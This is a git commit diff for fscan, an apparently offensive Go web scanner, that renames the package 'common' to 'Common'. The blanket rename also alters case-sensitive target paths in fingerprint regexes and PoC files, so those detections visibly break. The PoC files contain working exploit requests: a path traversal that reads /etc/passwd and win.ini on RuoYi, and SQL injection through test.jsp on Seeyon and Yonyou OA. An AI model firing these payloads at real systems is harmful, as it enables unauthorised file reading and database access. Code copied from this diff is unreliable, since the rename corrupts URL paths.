refactor: 规范化文件命名

WebScan/InfoScan.go

@@ -3,8 +3,8 @@ package WebScan
 import (
 	"crypto/md5"
 	"fmt"
+	"github.com/shadow1ng/fscan/Common"
 	"github.com/shadow1ng/fscan/WebScan/info"
-	"github.com/shadow1ng/fscan/common"
 	"regexp"
 )
 
@@ -39,7 +39,7 @@ func InfoCheck(Url string, CheckData *[]CheckDatas) []string {
 
 	if len(infoname) > 0 {
 		result := fmt.Sprintf("[+] InfoScan %-25v %s ", Url, infoname)
-		common.LogSuccess(result)
+		Common.LogSuccess(result)
 		return infoname
 	}
 	return []string{""}

WebScan/WebScan.go

@@ -3,9 +3,9 @@ package WebScan
 import (
 	"embed"
 	"fmt"
+	"github.com/shadow1ng/fscan/Common"
 	"github.com/shadow1ng/fscan/Config"
 	"github.com/shadow1ng/fscan/WebScan/lib"
-	"github.com/shadow1ng/fscan/common"
 	"net/http"
 	"os"
 	"path/filepath"
@@ -20,7 +20,7 @@ var AllPocs []*lib.Poc
 
 func WebScan(info *Config.HostInfo) {
 	once.Do(initpoc)
-	var pocinfo = common.Pocinfo
+	var pocinfo = Common.Pocinfo
 	buf := strings.Split(info.Url, "/")
 	pocinfo.Target = strings.Join(buf[:3], "/")
 
@@ -34,25 +34,25 @@ func WebScan(info *Config.HostInfo) {
 	}
 }
 
-func Execute(PocInfo common.PocInfo) {
+func Execute(PocInfo Common.PocInfo) {
 	req, err := http.NewRequest("GET", PocInfo.Target, nil)
 	if err != nil {
 		errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err)
-		common.LogError(errlog)
+		Common.LogError(errlog)
 		return
 	}
-	req.Header.Set("User-agent", common.UserAgent)
-	req.Header.Set("Accept", common.Accept)
+	req.Header.Set("User-agent", Common.UserAgent)
+	req.Header.Set("Accept", Common.Accept)
 	req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
-	if common.Cookie != "" {
-		req.Header.Set("Cookie", common.Cookie)
+	if Common.Cookie != "" {
+		req.Header.Set("Cookie", Common.Cookie)
 	}
 	pocs := filterPoc(PocInfo.PocName)
-	lib.CheckMultiPoc(req, pocs, common.PocNum)
+	lib.CheckMultiPoc(req, pocs, Common.PocNum)
 }
 
 func initpoc() {
-	if common.PocPath == "" {
+	if Common.PocPath == "" {
 		entries, err := Pocs.ReadDir("pocs")
 		if err != nil {
 			fmt.Printf("[-] init poc error: %v", err)
@@ -67,8 +67,8 @@ func initpoc() {
 			}
 		}
 	} else {
-		fmt.Println("[+] load poc from " + common.PocPath)
-		err := filepath.Walk(common.PocPath,
+		fmt.Println("[+] load poc from " + Common.PocPath)
+		err := filepath.Walk(Common.PocPath,
 			func(path string, info os.FileInfo, err error) error {
 				if err != nil || info == nil {
 					return err

WebScan/info/Rules.go

@@ -72,7 +72,7 @@ var RuleDatas = []RuleData{
 	{"atmail-WebMail", "cookie", "(atmail6)"},
 	{"atmail-WebMail", "code", "(/index.php/mail/auth/processlogin|Powered by Atmail)"},
 	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>)"},
-	{"致远OA", "code", "(/seeyon/common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
+	{"致远OA", "code", "(/seeyon/Common/|/seeyon/USER-DATA/IMAGES/LOGIN/login.gif)"},
 	{"discuz", "code", "(content=\"Discuz! X\")"},
 	{"Typecho", "code", "(Typecho</a>)"},
 	{"金蝶EAS", "code", "(easSessionId)"},
@@ -88,10 +88,10 @@ var RuleDatas = []RuleData{
 	{"CISCO_EPC3925", "code", "(Docsis_system)"},
 	{"CISCO ASR", "code", "(CISCO ASR)"},
 	{"H3C ER3200", "code", "(ER3200系统管理)"},
-	{"万户oa", "code", "(/defaultroot/templates/template_system/common/css/|/defaultroot/scripts/|css/css_whir.css)"},
+	{"万户oa", "code", "(/defaultroot/templates/template_system/Common/css/|/defaultroot/scripts/|css/css_whir.css)"},
 	{"Spark_Master", "code", "(Spark Master at)"},
 	{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
-	{"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
+	{"蓝凌OA", "code", "(/scripts/jquery.landray.Common.js)"},
 	{"深信服ssl-vpn", "code", "(login_psw.csp)"},
 	{"华为 NetOpen", "code", "(/netopen/theme/css/inFrame.css)"},
 	{"Citrix-Web-PN-Server", "code", "(Citrix Web PN Server)"},
@@ -229,14 +229,14 @@ var RuleDatas = []RuleData{
 	{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
 	{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
 	{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
-	{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/common)"},
+	{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/Common)"},
 	{"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"},
 	{"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
 	{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
 	{"weblogic", "code", "(/console/framework/skins/wlsconsole/images/login_WebLogic_branding.png|Welcome to Weblogic Application Server|<i>Hypertext Transfer Protocol -- HTTP/1.1</i>|<TITLE>Error 404--Not Found</TITLE>|Welcome to Weblogic Application Server|<title>Oracle WebLogic Server 管理控制台</title>)"},
 	{"weblogic", "headers", "(WebLogic)"},
-	{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"},
-	{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+	{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/Common/)"},
+	{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.Common.js)"},
 	{"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
 	{"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
 	{"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
@@ -246,7 +246,7 @@ var RuleDatas = []RuleData{
 	{"用友NC", "code", "(Yonyou UAP|YONYOU NC|/Client/Uclient/UClient.dmg|logo/images/ufida_nc.png|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
 	{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
 	{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
-	{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
+	{"JEECMS", "code", "(/r/cms/www/red/js/Common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
 	{"CMS", "code", "(Powered by .*CMS)"},
 	{"目录遍历", "code", "(Directory listing for /)"},
 	{"ATLASSIAN-Confluence", "code", "(com.atlassian.confluence)"},

WebScan/lib/Check.go

@@ -4,8 +4,8 @@ import (
 	"crypto/md5"
 	"fmt"
 	"github.com/google/cel-go/cel"
+	"github.com/shadow1ng/fscan/Common"
 	"github.com/shadow1ng/fscan/WebScan/info"
-	"github.com/shadow1ng/fscan/common"
 	"math/rand"
 	"net/http"
 	"net/url"
@@ -34,7 +34,7 @@ func CheckMultiPoc(req *http.Request, pocs []*Poc, workers int) {
 				isVul, _, name := executePoc(task.Req, task.Poc)
 				if isVul {
 					result := fmt.Sprintf("[+] PocScan %s %s %s", task.Req.URL, task.Poc.Name, name)
-					common.LogSuccess(result)
+					Common.LogSuccess(result)
 				}
 				wg.Done()
 			}
@@ -82,7 +82,7 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 	for _, item := range p.Set {
 		k, expression := item.Key, item.Value
 		if expression == "newReverse()" {
-			if !common.DnsLog {
+			if !Common.DnsLog {
 				return false, nil, ""
 			}
 			variableMap[k] = newReverse()
@@ -240,7 +240,7 @@ func optimizeCookies(rawCookie string) (output string) {
 }
 
 func newReverse() *Reverse {
-	if !common.DnsLog {
+	if !Common.DnsLog {
 		return &Reverse{}
 	}
 	letters := "1234567890abcdefghijklmnopqrstuvwxyz"
@@ -280,7 +280,7 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
 	look:
 		for j, item := range setsMap {
 			//shiro默认只跑10key
-			if p.Name == "poc-yaml-shiro-key" && !common.PocFull && j >= 10 {
+			if p.Name == "poc-yaml-shiro-key" && !Common.PocFull && j >= 10 {
 				if item[1] == "cbc" {
 					continue
 				} else {
@@ -356,15 +356,15 @@ func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{},
 			if success {
 				if rule.Continue {
 					if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" {
-						common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
+						Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
 					} else {
-						common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
+						Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
 					}
 					continue
 				}
 				strMap = append(strMap, tmpMap...)
 				if i == len(p.Rules)-1 {
-					common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
+					Common.LogSuccess(fmt.Sprintf("[+] PocScan %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
 					//防止后续继续打印poc成功信息
 					return false, nil
 				}

WebScan/lib/Client.go

@@ -6,7 +6,7 @@ import (
 	"embed"
 	"errors"
 	"fmt"
-	"github.com/shadow1ng/fscan/common"
+	"github.com/shadow1ng/fscan/Common"
 	"golang.org/x/net/proxy"
 	"gopkg.in/yaml.v2"
 	"net"
@@ -25,14 +25,14 @@ var (
 )
 
 func Inithttp() {
-	//common.Proxy = "http://127.0.0.1:8080"
-	if common.PocNum == 0 {
-		common.PocNum = 20
+	//Common.Proxy = "http://127.0.0.1:8080"
+	if Common.PocNum == 0 {
+		Common.PocNum = 20
 	}
-	if common.WebTimeout == 0 {
-		common.WebTimeout = 5
+	if Common.WebTimeout == 0 {
+		Common.WebTimeout = 5
 	}
-	err := InitHttpClient(common.PocNum, common.Proxy, time.Duration(common.WebTimeout)*time.Second)
+	err := InitHttpClient(Common.PocNum, Common.Proxy, time.Duration(Common.WebTimeout)*time.Second)
 	if err != nil {
 		panic(err)
 	}
@@ -56,8 +56,8 @@ func InitHttpClient(ThreadsNum int, DownProxy string, Timeout time.Duration) err
 		DisableKeepAlives:   false,
 	}
 
-	if common.Socks5Proxy != "" {
-		dialSocksProxy, err := common.Socks5Dailer(dialer)
+	if Common.Socks5Proxy != "" {
+		dialSocksProxy, err := Common.Socks5Dailer(dialer)
 		if err != nil {
 			return err
 		}

WebScan/lib/Eval.go

@@ -12,7 +12,7 @@ import (
 	"github.com/google/cel-go/common/types"
 	"github.com/google/cel-go/common/types/ref"
 	"github.com/google/cel-go/interpreter/functions"
-	"github.com/shadow1ng/fscan/common"
+	"github.com/shadow1ng/fscan/Common"
 	exprpb "google.golang.org/genproto/googleapis/api/expr/v1alpha1"
 	"io"
 	"math/rand"
@@ -563,7 +563,7 @@ func randomString(n int) string {
 }
 
 func reverseCheck(r *Reverse, timeout int64) bool {
-	if ceyeApi == "" || r.Domain == "" || !common.DnsLog {
+	if ceyeApi == "" || r.Domain == "" || !Common.DnsLog {
 		return false
 	}
 	time.Sleep(time.Second * time.Duration(timeout))
@@ -627,7 +627,7 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) {
 	defer oResp.Body.Close()
 	resp, err := ParseResponse(oResp)
 	if err != nil {
-		common.LogError("[-] ParseResponse error: " + err.Error())
+		Common.LogError("[-] ParseResponse error: " + err.Error())
 		//return nil, err
 	}
 	return resp, err

WebScan/pocs/ruoyi-management-fileread.yml

@@ -2,12 +2,12 @@ name: poc-yaml-ruoyi-management-fileread
 groups:
   linux:
     - method: GET
-      path: /common/download/resource?resource=/profile/../../../../etc/passwd
+      path: /Common/download/resource?resource=/profile/../../../../etc/passwd
       expression: |
         response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
   windows:
     - method: GET
-      path: /common/download/resource?resource=/profile/../../../../Windows/win.ini
+      path: /Common/download/resource?resource=/profile/../../../../Windows/win.ini
       expression: |
         response.status == 200 && response.body.bcontains(b"for 16-bit app support")
 detail:

WebScan/pocs/seeyon-a6-test-jsp-sql.yml

@@ -3,7 +3,7 @@ set:
   rand: randomInt(200000000, 210000000)
 rules:
   - method: GET
-    path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
+    path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
     expression:
       response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
 detail:

WebScan/pocs/yonyou-u8-oa-sqli.yml

@@ -3,7 +3,7 @@ set:
   rand: randomInt(200000000, 220000000)
 rules:
   - method: GET
-    path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
+    path: /yyoa/Common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
     follow_redirects: false
     expression: |
       response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))